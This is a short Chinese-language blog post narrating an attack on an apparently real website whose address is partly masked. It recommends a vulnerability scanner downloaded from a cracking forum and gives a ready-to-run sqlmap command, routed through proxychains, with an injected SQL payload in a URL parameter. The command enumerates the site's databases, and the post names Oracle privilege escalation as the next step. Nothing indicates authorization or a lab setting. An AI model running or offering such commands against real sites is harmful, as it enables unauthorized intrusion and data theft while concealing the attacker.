虽然用工具比较low,但是先用工具,也许是走的最快的一条路。
0x01 工具列表:
awvs 可以在吾爱破解论坛上下载
sqlmap 注入神器
####0x02 扫描漏洞:
填入要扫描的网站url
- 选择相关联的url
- 经过一段时间的扫描之后,漏洞信息在列表中显示
- 右侧可以看到每一个漏洞的介绍和对应的信息,
0x03 用sqlmap攻击注入点
1 | proxychains sqlmap -u http://xx.xx.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=102%20AND%203*2*1%3d6%20AND%20998% --risk 3 --level 5 --dbs |
看到数据库是Oracle,Oracle数据库的提权是个坑,如果成功拿到权限,会在下一篇叙述。